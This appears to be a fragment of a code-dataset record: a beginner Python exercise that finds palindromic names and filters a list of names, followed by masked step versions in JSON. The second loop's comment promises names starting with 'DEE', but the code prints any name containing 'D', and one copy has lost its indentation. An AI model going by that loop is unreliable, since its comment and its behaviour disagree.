}
|
[
0,
1,
2,
3,
4
] |
data = " Ramya , Deepa,LIRIL ,amma, dad, Kiran, 12321 , Suresh, Jayesh, Ramesh,Balu"
lst = data.split(",")
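# Print the names that are palindromes (read the same forwards and backwards after trimming and uppercasing)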
for name in lst:
name = name.strip().upper()
rname = name[::-1]
if name == rname:
print(name)
girlsdata = "Tanvi,Dhatri,Haadya,Deepthi,Deepa,Ramya"
# Print the names that start with "DEE"
print("-"*20)
names = girlsdata.split(",")
for name in names:
name = name.upper()
if "D" in name:
print(name)
|
normal
|
{
"blob_id": "622b388beb56eba85bbb08510c2bcea55f23da9a",
"index": 721,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor name in lst:\n name = name.strip().upper()\n rname = name[::-1]\n if name == rname:\n print(name)\n<mask token>\nprint('-' * 20)\n<mask token>\nfor name in names:\n name = name.upper()\n if 'D' in name:\n print(name)\n",
"step-3": "data = (\n ' Ramya , Deepa,LIRIL ,amma, dad, Kiran, 12321 , Suresh, Jayesh, Ramesh,Balu'\n )\nlst = data.split(',')\nfor name in lst:\n name = name.strip().upper()\n rname = name[::-1]\n if name == rname:\n print(name)\ngirlsdata = 'Tanvi,Dhatri,Haadya,Deepthi,Deepa,Ramya'\nprint('-' * 20)\nnames = girlsdata.split(',')\nfor name in names:\n name = name.upper()\n if 'D' in name:\n print(name)\n",
"step-4": "data = \" Ramya , Deepa,LIRIL ,amma, dad, Kiran, 12321 , Suresh, Jayesh, Ramesh,Balu\"\n\nlst = data.split(\",\")\n\nfor name in lst:\n name = name.strip().upper()\n rname = name[::-1]\n if name == rname:\n print(name)\n\ngirlsdata = \"Tanvi,Dhatri,Haadya,Deepthi,Deepa,Ramya\"\n# Name which start with DEE get those name\nprint(\"-\"*20)\nnames = girlsdata.split(\",\")\nfor name in names:\n name = name.upper()\n if \"D\" in name:\n print(name)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
The top public SQL queries from the community will appear here once available.